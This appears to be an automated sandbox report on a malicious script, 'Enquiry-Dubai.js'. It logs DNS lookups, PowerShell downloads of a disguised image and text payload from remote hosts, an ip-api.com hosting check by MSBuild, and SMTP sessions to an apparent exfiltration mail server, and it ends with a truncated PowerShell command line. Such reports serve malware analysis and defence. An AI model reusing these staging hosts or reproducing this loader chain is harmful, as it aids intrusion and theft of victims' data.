                                                                                      Mar 23, 2025 21:49:02.034147024 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:49:02.034194946 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:49:02.034194946 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:49:02.122334957 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:49:02.122385979 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:49:02.122420073 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:49:02.122452974 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:49:02.122478008 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:49:02.122497082 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:49:02.122762918 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:49:06.181354046 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:06.252747059 CET49680443192.168.2.4204.79.197.222
                                                                                      Mar 23, 2025 21:49:06.609875917 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:06.610153913 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:06.795133114 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:06.795449018 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:06.981169939 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:06.987845898 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.183367968 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.183427095 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.183463097 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.183475971 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.215440035 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.401406050 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.417431116 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.605463982 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.606479883 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.793252945 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.793581009 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.985965967 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.986218929 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.170986891 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.171178102 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.358836889 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.359025002 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.533993959 CET49678443192.168.2.420.189.173.27
                                                                                      Mar 23, 2025 21:49:08.546375990 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.546899080 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.546941042 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.546976089 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.547002077 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.731591940 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.731620073 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.731637001 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.731654882 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.735472918 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.750617027 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.937836885 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.940840960 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.941977978 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.121869087 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.122005939 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.426950932 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.427094936 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.607383966 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.607556105 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.788827896 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.789285898 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.980288029 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.980340958 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.980360985 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.980509996 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.981775999 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:10.162087917 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:10.163218975 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:10.344337940 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:10.344600916 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:10.525366068 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:10.525769949 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:10.710099936 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:10.710364103 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:10.895131111 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:10.895493031 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.077600956 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.078119040 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.258503914 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.258833885 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.258861065 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.258881092 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.258900881 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.438950062 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.439027071 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.439193964 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.439213991 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.441217899 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.487225056 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:15.346520901 CET4968180192.168.2.42.17.190.73
                                                                                      Mar 23, 2025 21:49:15.862169981 CET49680443192.168.2.4204.79.197.222
                                                                                      Mar 23, 2025 21:49:55.472001076 CET4972480192.168.2.4208.95.112.1
                                                                                      Mar 23, 2025 21:49:55.568274975 CET8049724208.95.112.1192.168.2.4
                                                                                      Mar 23, 2025 21:49:55.568485975 CET4972480192.168.2.4208.95.112.1
                                                                                      Mar 23, 2025 21:49:57.862473965 CET4972080192.168.2.4142.251.40.227
                                                                                      Mar 23, 2025 21:49:57.951841116 CET8049720142.251.40.227192.168.2.4
                                                                                      Mar 23, 2025 21:49:57.951914072 CET4972080192.168.2.4142.251.40.227
                                                                                      Mar 23, 2025 21:50:28.284317970 CET49708443192.168.2.452.113.196.254
                                                                                      Mar 23, 2025 21:50:45.487723112 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:50:45.668392897 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:50:45.669246912 CET49726587192.168.2.4161.97.124.96
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Mar 23, 2025 21:48:54.398217916 CET | 62194 | 53 | 192.168.2.4 | 1.1.1.1 |
| Mar 23, 2025 21:48:54.590472937 CET | 53 | 62194 | 1.1.1.1 | 192.168.2.4 |
| Mar 23, 2025 21:48:57.025158882 CET | 58011 | 53 | 192.168.2.4 | 1.1.1.1 |
| Mar 23, 2025 21:48:57.123754978 CET | 53 | 58011 | 1.1.1.1 | 192.168.2.4 |
| Mar 23, 2025 21:49:02.731956959 CET | 59627 | 53 | 192.168.2.4 | 1.1.1.1 |
| Mar 23, 2025 21:49:02.833312988 CET | 53 | 59627 | 1.1.1.1 | 192.168.2.4 |
| Mar 23, 2025 21:49:04.495019913 CET | 65241 | 53 | 192.168.2.4 | 1.1.1.1 |
| Mar 23, 2025 21:49:04.593508959 CET | 53 | 65241 | 1.1.1.1 | 192.168.2.4 |
| Mar 23, 2025 21:49:05.467026949 CET | 55479 | 53 | 192.168.2.4 | 1.1.1.1 |
| Mar 23, 2025 21:49:05.994764090 CET | 53 | 55479 | 1.1.1.1 | 192.168.2.4 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Mar 23, 2025 21:48:54.398217916 CET | 192.168.2.4 | 1.1.1.1 | 0x6a4d | Standard query (0) | ia600204.us.archive.org | A (IP address) | IN (0x0001) | false |
| Mar 23, 2025 21:48:57.025158882 CET | 192.168.2.4 | 1.1.1.1 | 0x302 | Standard query (0) | c.pki.goog | A (IP address) | IN (0x0001) | false |
| Mar 23, 2025 21:49:02.731956959 CET | 192.168.2.4 | 1.1.1.1 | 0xc816 | Standard query (0) | pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev | A (IP address) | IN (0x0001) | false |
| Mar 23, 2025 21:49:04.495019913 CET | 192.168.2.4 | 1.1.1.1 | 0x412a | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false |
| Mar 23, 2025 21:49:05.467026949 CET | 192.168.2.4 | 1.1.1.1 | 0x9d38 | Standard query (0) | mail.detarcoopmedical.com | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Mar 23, 2025 21:48:54.590472937 CET | 1.1.1.1 | 192.168.2.4 | 0x6a4d | No error (0) | ia600204.us.archive.org | | 207.241.227.224 | A (IP address) | IN (0x0001) | false |
| Mar 23, 2025 21:48:56.833044052 CET | 1.1.1.1 | 192.168.2.4 | 0xcc03 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Mar 23, 2025 21:48:56.833044052 CET | 1.1.1.1 | 192.168.2.4 | 0xcc03 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Mar 23, 2025 21:48:57.123754978 CET | 1.1.1.1 | 192.168.2.4 | 0x302 | No error (0) | c.pki.goog | pki-goog.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 23, 2025 21:48:57.123754978 CET | 1.1.1.1 | 192.168.2.4 | 0x302 | No error (0) | pki-goog.l.google.com | | 142.251.40.227 | A (IP address) | IN (0x0001) | false |
| Mar 23, 2025 21:49:02.833312988 CET | 1.1.1.1 | 192.168.2.4 | 0xc816 | No error (0) | pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev | | 172.66.0.235 | A (IP address) | IN (0x0001) | false |
| Mar 23, 2025 21:49:02.833312988 CET | 1.1.1.1 | 192.168.2.4 | 0xc816 | No error (0) | pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev | | 162.159.140.237 | A (IP address) | IN (0x0001) | false |
| Mar 23, 2025 21:49:04.593508959 CET | 1.1.1.1 | 192.168.2.4 | 0x412a | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false |
| Mar 23, 2025 21:49:05.994764090 CET | 1.1.1.1 | 192.168.2.4 | 0x9d38 | No error (0) | mail.detarcoopmedical.com | detarcoopmedical.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 23, 2025 21:49:05.994764090 CET | 1.1.1.1 | 192.168.2.4 | 0x9d38 | No error (0) | detarcoopmedical.com | | 161.97.124.96 | A (IP address) | IN (0x0001) | false |

• ia600204.us.archive.org
• pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev
• c.pki.goog
• ip-api.com

| Session ID | Source IP | Source Port | Destination IP | Destination Port |
|---|---|---|---|---|
| 0 | 192.168.2.4 | 49720 | 142.251.40.227 | 80 |

Timestamp: Mar 23, 2025 21:48:57.214001894 CET, Bytes transferred: 202, Direction: OUT, Data:
GET /r/gsr1.crl HTTP/1.1
Cache-Control: max-age = 3000
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Timestamp: Mar 23, 2025 21:48:57.306162119 CET, Bytes transferred: 223, Direction: IN, Data:
HTTP/1.1 304 Not Modified
Date: Sun, 23 Mar 2025 20:03:27 GMT
Expires: Sun, 23 Mar 2025 20:53:27 GMT
Age: 2730
Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
Cache-Control: public, max-age=3000
Vary: Accept-Encoding

Timestamp: Mar 23, 2025 21:48:57.313484907 CET, Bytes transferred: 200, Direction: OUT, Data:
GET /r/r4.crl HTTP/1.1
Cache-Control: max-age = 3000
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Timestamp: Mar 23, 2025 21:48:57.404122114 CET, Bytes transferred: 223, Direction: IN, Data:
HTTP/1.1 304 Not Modified
Date: Sun, 23 Mar 2025 20:03:30 GMT
Expires: Sun, 23 Mar 2025 20:53:30 GMT
Age: 2727
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Cache-Control: public, max-age=3000
Vary: Accept-Encoding


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49724 | 208.95.112.1 | 80 | 3028 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |

Timestamp: Mar 23, 2025 21:49:04.697465897 CET, Bytes transferred: 80, Direction: OUT, Data:
GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Timestamp: Mar 23, 2025 21:49:04.792952061 CET, Bytes transferred: 175, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Sun, 23 Mar 2025 20:49:04 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49716 | 207.241.227.224 | 443 | 8188 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |

Timestamp: 2025-03-23 20:48:55 UTC, Bytes transferred: 114, Direction: OUT, Data:
GET /25/items/new_image_20250318/new_image.jpg HTTP/1.1
Host: ia600204.us.archive.org
Connection: Keep-Alive

Timestamp: 2025-03-23 20:48:55 UTC, Bytes transferred: 582, Direction: IN, Data:
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Mar 2025 20:48:55 GMT
Content-Type: image/jpeg
Content-Length: 3268007
Last-Modified: Tue, 18 Mar 2025 13:44:02 GMT
Connection: close
ETag: "67d978a2-31dda7"
Strict-Transport-Security: max-age=15724800
Expires: Mon, 24 Mar 2025 02:48:55 GMT
Cache-Control: max-age=21600
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
                                                                                      Data Ascii: dWjnS=oqph5W<In7m>>O+u7i.u}/s'']<y9<t|^Y<S2o:yEuYL7y[lt^-c99OGb*JZ`%,Ho(Y"lMe5qV(*LH-..,QBKXX
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: c6 e5 6e 83 79 85 30 a9 8a 4e a9 19 54 bb 77 10 c8 3b ea ed fc 01 87 9c 9d 02 e9 7a fa 9d 1b 5e f3 51 da 73 9d 38 ac fa 95 57 17 29 85 90 8a cb 53 89 2b 20 8d 1c 00 d3 64 1d 1a 73 a7 3f cb 12 d8 92 b1 a6 fa 6d f0 ed e1 1a 15 b9 d8 ce ae a4 f6 35 70 db 2d a1 55 94 fe 02 db 56 fe 3d b3 66 85 0f 94 7e 04 6a c6 1a af ea ba 47 f4 8f fe 87 8a 35 ea 74 ef a9 51 d5 5f e2 62 7f be 00 9f 06 8b 9d d5 74 8e e9 0f e0 b6 93 de 35 92 7f 3c ff 00 a6 0a 8f ea cf a5 d3 73 f1 1d 25 4e 14 04 7c 77 f0 21 46 14 a8 42 66 32 a9 d2 35 2a 3d 8e 63 c4 85 02 e0 a7 1b 05 c2 b6 1a 77 60 a6 e6 3d d2 00 94 4a c3 54 12 59 4e a2 a8 fb aa 34 c3 9c eb aa 12 49 7b 61 84 63 85 de a9 d9 b0 80 fb 02 84 48 b5 65 6c b6 12 82 08 87 2b 17 f1 53 1a d2 b0 d5 75 9d e3 ad 1e d5 f6 90 13 81 9d 27 c8 78
                                                                                      Data Ascii: ny0NTw;z^Qs8W)S+ ds?m5p-UV=f~jG5tQ_bt5<s%N|w!FBf25*=cw`=JTYN4I{acHel+Su'x
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: 55 1a 9d ba 4d 10 9b ea 4d 4b 9c 1c e9 87 55 52 af 24 ff 00 2b 93 5d 21 d5 25 b3 71 70 b5 ee fa f7 6e 54 fe d6 90 6a 16 a2 60 ce 4b 48 57 00 ad b8 f3 ba 2e 96 9f aa 0d c2 e7 9a 3d 3b ab d4 ab 45 d4 6a 91 07 2a e3 1c 68 35 84 5b af 1c 7c 07 6e 27 43 e5 c7 1f 00 0b 9e 34 68 47 7b 14 65 c6 74 b4 94 d8 6a 75 aa 25 6c 83 4b dd 5e 83 fa 77 29 d2 54 e1 65 4a fe 24 e7 90 8e 9c 6a d8 3e 11 9f 0e 34 db 4d bc 86 0f ce 14 98 d4 20 61 0a a5 a1 c5 73 f8 8c 61 7b ba 9e 92 a7 4a ef ce 2e 2e 53 8f eb ef 36 7f 41 c0 6e 2c 9d 68 d7 a9 41 cf 79 a8 ff 00 c0 e0 02 74 22 02 26 74 9c 78 14 23 5f e2 82 6d 42 c7 12 a1 73 3a cc 83 b7 6e 5b 0a 06 a3 5c 47 3e 7b ae 16 5d af 0a 57 1c f2 bf 8e eb 33 32 83 6a 5b 32 3d 6c 11 01 d2 84 4f f2 6b 49 0d 22 00 ce ea 9e 49 18 74 94 1f 2d 9c 5e
                                                                                      Data Ascii: UMMKUR$+]!%qpnTj`KHW.=;Ej*h5[|n'C4hG{etju%lK^w)TeJ$j>4M asa{J..S6An,hAyt"&tx#_mBs:n[\G>{]W32j[2=lOkI"It-^
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: 18 6c b7 c5 ae b7 fb ae 74 e4 26 99 54 3a da 0c e9 7a ba ad a9 d4 1d e0 db e5 b6 b1 81 10 d6 dd a7 1b 1c 85 33 a4 e9 42 a0 a2 e3 a0 db 9d 25 31 e5 88 7a 92 57 0a 34 aa da 30 a1 6c b1 a4 2c 47 13 e1 09 a0 ca 7e 49 10 4a 8c 46 bb 69 38 0d d0 a1 84 26 d4 03 8b 9b 2d 5b 3a 93 ae ab 5e 4b de ec f2 f3 0c 69 54 da 1c ff 00 e4 08 7a 92 5f 51 f2 eb 0b cc 4a a3 57 d8 be 49 ca b7 2e 30 ae 59 57 5a 5e f8 6d d9 98 26 a3 61 d1 2d 78 80 40 6d d0 7f 91 64 a0 cf 56 c8 39 69 2f b9 5c 99 82 f3 a3 9b 92 2d 42 d7 b1 de ae 85 1a 4c 89 c9 09 9b 22 df 62 44 fd 4c 94 d4 13 a6 09 f5 99 5c 80 22 30 47 ac a0 41 7d 57 31 d5 5a e6 b9 6e e1 b8 c1 dc 98 27 63 71 0a 1c d0 3e c0 4b 9e e2 f0 cc ac 97 7a 93 09 e0 26 a2 03 58 d5 4d f0 6a 19 2e 6b 42 92 04 85 4f 7a c5 a0 16 bf b6 c9 47 ec 55
                                                                                      Data Ascii: lt&T:z3B%1zW40l,G~IJFi8&-[:^KiTz_QJWI.0YWZ^m&a-x@mdV9i/\-BL"bDL\"0GA}W1Zn'cq>Kz&XMj.kBOzGU
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: e2 43 9e e8 b9 a0 10 00 2e 67 ad 5e ae a7 4e ea ac 25 88 9b 90 12 40 a4 68 a1 00 fa a1 85 4e a3 69 89 05 bc 5a e7 1b 5c 48 57 0b 40 24 8d b0 01 55 5d 44 07 19 57 e2 34 1b 2d ce 97 64 20 51 08 14 0c 28 40 49 68 bc ff 00 2e 73 20 2b 8c 9b 63 05 92 7b 6e 8f db f2 5c f7 37 36 96 02 c1 11 6c 1e d1 65 67 8e e5 69 55 aa 77 5f 89 5b ab 6d 5e c5 11 88 4d b5 b4 c1 b5 49 26 00 7d f6 30 04 ec 91 80 f9 92 db 4c 10 be b4 6e c9 73 ae 25 18 b0 80 13 e0 3a 91 a6 4f 69 8f ea 2b 52 6d 2a f4 de 18 23 00 a1 be ea 61 66 06 e3 77 0b 57 12 5c dd f4 05 a2 9c 14 05 c8 65 07 42 b9 ce 23 70 e8 00 60 ed 98 89 50 89 95 18 75 91 38 1a 1f a8 26 38 19 43 ed 7c a6 e4 9d c0 c0 d9 31 f0 d1 73 53 88 4e dd b4 ef 53 01 e6 57 d8 82 e6 9f e7 53 b2 6a 20 21 a1 37 7e 66 15 36 de 79 6b 4b 93 5b ee
                                                                                      Data Ascii: C.g^N%@hNiZ\HW@$U]DW4-d Q(@Ih.s +c{n\76legiUw_[m^MI&}0Lns%:Oi+Rm*#afwW\eB#p`Pu8&8C|1sSNSWSj !7~f6ykK[
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: c4 05 0a 17 32 8e 4f d5 09 28 3a 17 03 76 ac 2b a5 6c 82 9c b0 fb 17 5e fb a0 8a 85 35 d7 27 d4 00 40 8f b2 74 22 e7 22 1b 3b 8a 64 a2 2e 5b 1e db bb 52 1c 8f ab bf 83 94 63 08 55 75 16 84 ca a6 9a 0e 8d 06 ca ef 40 33 19 c4 f2 16 e0 6c 82 c7 c1 ba d8 9d 5c 20 2d 8f 3e 07 c2 3d 46 fd d7 01 a4 08 a9 50 3d 8b 63 db 7d bb e8 3e b7 18 52 62 7c c6 fc f8 f1 fd 43 0e 7a 3a b6 3a 8d 4b 97 ea c3 ff 00 f2 1f 9d 53 a0 ad 4f a5 d2 7f b2 e3 f3 ba 1a fd 2b 19 cc 4a a6 c3 51 f5 a9 1a 35 3f 18 35 51 a1 71 e8 fa 08 58 68 73 c1 46 11 70 0a a5 5b 13 ba bb 10 78 6b 5d d5 4d 4e fc ae f5 24 ee a2 f0 1a c8 0d 60 2f 02 43 80 5d d0 bb 80 b9 c2 d7 5d eb 44 1b f8 35 1a e3 dc 6b 57 ee 69 83 4f a8 6b cb 5c 85 40 88 69 41 ba 11 72 fd b3 24 08 f1 2c 37 09 8f 2a fd 33 6a 8e b3 f4 f3 4c
                                                                                      Data Ascii: 2O(:v+l^5'@t"";d.[RcUu@3l\ ->=FP=c}>Rb|Cz::KSO+JQ5?5QqXhsFp[xk]MN$`/C]]D5kWiOk\@iAr$,7*3jL


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49723        172.66.0.235    443               8188  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2025-03-23 20:49:03 UTC  100                OUT        GET /223.txt HTTP/1.1
                                                       Host: pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev
                                                       Connection: Keep-Alive
2025-03-23 20:49:03 UTC  285                IN         HTTP/1.1 200 OK
                                                       Date: Sun, 23 Mar 2025 20:49:03 GMT
                                                       Content-Type: text/plain
                                                       Content-Length: 327680
                                                       Connection: close
                                                       Accept-Ranges: bytes
                                                       ETag: "212bd8b6f43f2ddb04096efd4b03a531"
                                                       Last-Modified: Sun, 23 Mar 2025 05:24:24 GMT
                                                       Server: cloudflare
                                                       CF-RAY: 9250cb0b2aaa42bd-EWR


Timestamp                            Source Port  Dest Port  Source IP      Dest IP        Commands
Mar 23, 2025 21:49:06.609875917 CET  587          49725      161.97.124.96  192.168.2.4    220-ss5103.hostingcare.net ESMTP Exim 4.98.1 #2 Sun, 23 Mar 2025 21:49:06 +0100
                                                                                           220-We do not authorize the use of this system to transport unsolicited,
                                                                                           220 and/or bulk e-mail.
Mar 23, 2025 21:49:06.610153913 CET  49725        587        192.168.2.4    161.97.124.96  EHLO 114127
Mar 23, 2025 21:49:06.795133114 CET  587          49725      161.97.124.96  192.168.2.4    250-ss5103.hostingcare.net Hello 114127 [161.77.13.2]
                                                                                           250-SIZE 52428800
                                                                                           250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                                                                           250-8BITMIME
                                                                                           250-PIPELINING
                                                                                           250-PIPECONNECT
                                                                                           250-AUTH PLAIN LOGIN
                                                                                           250-STARTTLS
                                                                                           250 HELP
Mar 23, 2025 21:49:06.795449018 CET  49725        587        192.168.2.4    161.97.124.96  STARTTLS
Mar 23, 2025 21:49:06.981169939 CET  587          49725      161.97.124.96  192.168.2.4    220 TLS go ahead
Mar 23, 2025 21:49:09.426950932 CET  587          49726      161.97.124.96  192.168.2.4    220-ss5103.hostingcare.net ESMTP Exim 4.98.1 #2 Sun, 23 Mar 2025 21:49:09 +0100
                                                                                           220-We do not authorize the use of this system to transport unsolicited,
                                                                                           220 and/or bulk e-mail.
Mar 23, 2025 21:49:09.427094936 CET  49726        587        192.168.2.4    161.97.124.96  EHLO 114127
Mar 23, 2025 21:49:09.607383966 CET  587          49726      161.97.124.96  192.168.2.4    250-ss5103.hostingcare.net Hello 114127 [161.77.13.2]
                                                                                           250-SIZE 52428800
                                                                                           250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                                                                           250-8BITMIME
                                                                                           250-PIPELINING
                                                                                           250-PIPECONNECT
                                                                                           250-AUTH PLAIN LOGIN
                                                                                           250-STARTTLS
                                                                                           250 HELP
Mar 23, 2025 21:49:09.607556105 CET  49726        587        192.168.2.4    161.97.124.96  STARTTLS
Mar 23, 2025 21:49:09.788827896 CET  587          49726      161.97.124.96  192.168.2.4    220 TLS go ahead


                                                                                      Target ID:0
                                                                                      Start time:16:48:40
                                                                                      Start date:23/03/2025
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js"
                                                                                      Imagebase:0x7ff620160000
                                                                                      File size:170'496 bytes
                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:16:48:51
                                                                                      Start date:23/03/2025
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = '[obfuscated Base64 payload omitted]
